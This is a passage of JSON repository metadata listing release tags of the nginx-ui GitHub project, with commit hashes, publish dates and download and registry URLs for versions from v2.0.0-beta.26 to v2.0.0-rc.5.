"name":"v2.0.0-rc.5","sha":"ccfd40a6e0293de270a17f63673957cad9ae4872","kind":"commit","published_at":"2025-03-31T02:55:53.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.5/manifests"},{"name":"v2.0.0-rc.4-patch.3","sha":"a158d2b441df0c4fd136fba31880bdbe47a57382","kind":"commit","published_at":"2025-03-27T07:49:13.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.4-patch.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.4-patch.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.4-patch.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.4-patch.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.4-patch.3/manifests"},{"name":"v2.0.0-rc.4-patch.2","sha":"789698a0d48465dc7c1da6dc3251b5fc5dcdfb75","kind":"commit","published_at":"2025-03-15T01:10:37.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.4-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.4-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.4-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.4-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.4-patch.2/manifests"},{"name":"v2.0.0-rc.4-patch.1","sha":"3108dd0f649d85cedfc7918d0f5886746867fefe","kind":"commit","published_at":"2025-03-12T08:07:30.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.4-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.4-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.4-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.4-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.4-patch.1/manifests"},{"name":"v2.0.0-rc.4","sha":"22834f59b459385d46889fc924ff45f81e6d30fb","kind":"commit","published_at":"2025-03-09T00:36:58.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.4/manifests"},{"name":"v2.0.0-rc.3-patch.1","sha":"3e2a95269eda0d90dcad1ed2cfe9ec31311e3468","kind":"commit","published_at":"2025-02-26T06:48:00.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.3-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.3-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.3-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.3-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.3-patch.1/manifests"},{"name":"v2.0.0-rc.3","sha":"ab46d1de7e20a221cedd846af6882178192bc2e0","kind":"commit","published_at":"2025-02-25T11:06:39.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.3/manifests"},{"name":"v2.0.0-rc.2","sha":"9d90ed8f4a90273c1acfe530e4b7403609e06396","kind":"commit","published_at":"2025-02-11T02:57:51.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.2/manifests"},{"name":"v2.0.0-rc.1-patch.2","sha":"8e523258b51fd24da0b8b82e84519c355ce84c4c","kind":"commit","published_at":"2025-02-06T13:01:36.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.1-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.1-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.1-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.1-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.1-patch.2/manifests"},{"name":"v2.0.0-rc.1-patch.1","sha":"70495999223c0f437be41aa7d69ace5480342f4d","kind":"commit","published_at":"2025-02-06T10:03:49.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.1-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.1-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.1-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.1-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.1-patch.1/manifests"},{"name":"v2.0.0-rc.1","sha":"f423b6599ca8cbf307a1d95b7b2d77978687ce9a","kind":"commit","published_at":"2025-02-06T03:15:04.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.1/manifests"},{"name":"v2.0.0-beta.42","sha":"54dddfa9ef14f44168b2a18b69570eeb9b1b38f5","kind":"commit","published_at":"2024-12-15T13:33:05.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.42","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.42","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.42","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.42","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.42/manifests"},{"name":"v2.0.0-beta.41","sha":"32663e1c260bb9d59c0ccaefc08b6ba5700c10bf","kind":"commit","published_at":"2024-11-24T03:19:11.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.41","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.41","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.41","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.41","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.41/manifests"},{"name":"v2.0.0-beta.40","sha":"e8a48d2f7e55725cc78eeab0376323bac2a4f525","kind":"commit","published_at":"2024-11-16T07:26:38.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.40","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.40","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.40","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.40","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.40/manifests"},{"name":"v2.0.0-beta.39-risefront.6","sha":"14669875a8f009d181389144b199cdf737fabe4c","kind":"commit","published_at":"2024-11-08T11:57:24.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.39-risefront.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.39-risefront.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.39-risefront.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.6/manifests"},{"name":"v2.0.0-beta.39-risefront.5","sha":"21d927e86ba01ce2c2929ffd7ff8fe80f24af541","kind":"commit","published_at":"2024-11-08T09:06:52.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.39-risefront.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.39-risefront.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.39-risefront.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.5/manifests"},{"name":"v2.0.0-beta.39-risefront.4","sha":"5698418f14dfa75b5725fb332d08f4f6192d2775","kind":"commit","published_at":"2024-11-08T01:57:01.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.39-risefront.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.39-risefront.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.39-risefront.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.4/manifests"},{"name":"v2.0.0-beta.39-risefront.3","sha":"eab694a40afb66c6f83a6c3e274f8e1f597b46e4","kind":"commit","published_at":"2024-11-06T18:26:10.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.39-risefront.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.39-risefront.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.39-risefront.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.3/manifests"},{"name":"v2.0.0-beta.39-risefront.2","sha":"94ca26d0ea4a89e136b78fe106439c43f727e03d","kind":"commit","published_at":"2024-11-06T15:07:30.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.39-risefront.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.39-risefront.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.39-risefront.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront.2/manifests"},{"name":"v2.0.0-beta.39-risefront","sha":"96dfbd00256557d952e50339f06722f93431bb3f","kind":"commit","published_at":"2024-11-05T13:35:00.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.39-risefront","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.39-risefront","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.39-risefront","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39-risefront/manifests"},{"name":"v2.0.0-beta.39","sha":"b21eb85a1a2d7503a4174e89e0541210cb635d4f","kind":"commit","published_at":"2024-10-30T01:29:44.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.39","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.39","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.39","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.39/manifests"},{"name":"v2.0.0-beta.38","sha":"bb02d7be77ba4c8131592b86ff99b4635f3178d2","kind":"commit","published_at":"2024-10-28T09:12:48.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.38","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.38","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.38","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.38","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.38/manifests"},{"name":"v2.0.0-beta.37-patch.5","sha":"6c31c89cbceac4f83051b37f0106e0f265daf81d","kind":"commit","published_at":"2024-10-26T15:06:52.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.37-patch.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.37-patch.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.37-patch.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.5/manifests"},{"name":"v2.0.0-beta.37-patch.3","sha":"1e2859c1841f8f33499b855c0d0cd8a0e06e0614","kind":"commit","published_at":"2024-10-26T13:46:32.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.37-patch.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.37-patch.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.37-patch.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.3/manifests"},{"name":"v2.0.0-beta.37-patch.4","sha":"1e2859c1841f8f33499b855c0d0cd8a0e06e0614","kind":"commit","published_at":"2024-10-26T13:46:32.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.37-patch.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.37-patch.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.37-patch.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.4/manifests"},{"name":"v2.0.0-beta.37-patch.2","sha":"7ea0aad938cac31fe1b9dc63adc382cbdac20a30","kind":"commit","published_at":"2024-10-26T10:27:21.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.37-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.37-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.37-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.2/manifests"},{"name":"v2.0.0-beta.37-patch.1","sha":"0b6149b28fefdc281df037bcc85d813caa3c0df1","kind":"commit","published_at":"2024-10-26T10:15:39.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.37-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.37-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.37-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37-patch.1/manifests"},{"name":"v2.0.0-beta.37","sha":"c8c0446308358cc23f112b73085f623be4e9995d","kind":"commit","published_at":"2024-10-26T09:20:45.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.37","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.37","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.37","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.37/manifests"},{"name":"v2.0.0-beta.36","sha":"96cff98c66deba24a20fdde4c6722896f3617680","kind":"commit","published_at":"2024-10-09T00:51:41.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.36","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.36","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.36","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.36","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.36/manifests"},{"name":"v2.0.0-beta.35","sha":"0ed7071e8ee2be39c6586a9ede24647b585dad3f","kind":"commit","published_at":"2024-09-26T05:36:46.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.35","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.35/manifests"},{"name":"v2.0.0-beta.34","sha":"46ae1127a271d8776b6187e11569d2f0fd99b92d","kind":"commit","published_at":"2024-09-17T00:49:18.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.34","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.34/manifests"},{"name":"v2.0.0-beta.33","sha":"44c3180df7674773e24214b9f324c562f879fda7","kind":"commit","published_at":"2024-09-15T04:09:24.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.33","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.33/manifests"},{"name":"v2.0.0-beta.32-patch.1","sha":"ec312c9f28426732b75329e9ef84a59eacdaef5f","kind":"commit","published_at":"2024-08-27T05:25:30.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.32-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.32-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.32-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.32-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.32-patch.1/manifests"},{"name":"v2.0.0-beta.32","sha":"2feefbe65e82c930b141f7ced6d22f5fe5192d74","kind":"commit","published_at":"2024-08-27T02:41:20.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.32","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.32/manifests"},{"name":"v2.0.0-beta.31","sha":"324a7635cd0f0d7515e09d1e50ee388d60d1e6e6","kind":"commit","published_at":"2024-08-19T09:53:51.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.31","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.31/manifests"},{"name":"v2.0.0-beta.30","sha":"6f6540ace1eef6d8c4b9a5f8138fc79003a7f141","kind":"commit","published_at":"2024-08-02T12:17:51.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.30","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.30/manifests"},{"name":"v2.0.0-beta.29","sha":"4d088f6a44947819f3645a71b9f69e0c61bf1000","kind":"commit","published_at":"2024-07-27T04:59:13.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.29","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.29/manifests"},{"name":"v2.0.0-beta.28","sha":"7646b87da07ccdb49328b2ec15ded49fdded21f6","kind":"commit","published_at":"2024-07-24T15:10:04.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.28","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.28/manifests"},{"name":"v2.0.0-beta.27","sha":"a48fde8be3addb21c9a2c198054d398adc98914e","kind":"commit","published_at":"2024-07-23T15:15:17.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.27","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.27/manifests"},{"name":"v2.0.0-beta.26","sha":"f41b6bc07b621c56a8b62205e6410